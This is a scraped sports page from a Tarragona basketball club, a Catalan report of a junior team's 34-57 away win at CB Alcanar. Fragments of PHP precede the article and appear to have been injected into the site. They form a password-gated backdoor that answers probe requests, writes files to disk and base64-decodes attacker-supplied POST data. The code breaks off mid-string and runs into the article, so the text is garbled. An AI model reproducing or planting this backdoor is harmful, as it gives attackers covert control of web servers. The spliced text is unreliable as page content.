function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior masculí B fa un tercer quart esplèndid i venç a la pista del CB Alcanar (34-57) - Tgn Bàsquet Club -

El júnior masculí B fa un tercer quart esplèndid i venç a la pista del CB Alcanar (34-57)

Updated: març 7, 2017

El júnior masculí B va vèncer el CB Alcanar després de fer un gran tercer període que va servir per refer-se d’uns dos primers períodes fluixos. Així, els tarragonins no van treure gaire partit de la seva defensa pressionant en el primer període. Sense inspiració ofensiva, l’atac lila es va col·lapsar en el segon quart per culpa de la zona 2-3 local i els visitants van sumar fins a 9 minuts sense anotar. Després del descans, el TGN Bàsquet va sortir amb les idees molt clares. La defensa pressionant feia constants dos contra un als laterals i això va permetre trencar el ritme de partit i anotar amb més fluïdesa. En estàtic, Demattey va ser clau i el parcial de 6-23 va deixar el matx mig sentenciat tot i l’intent de reacció dels locals, que no va reeixir pel bon treball lila.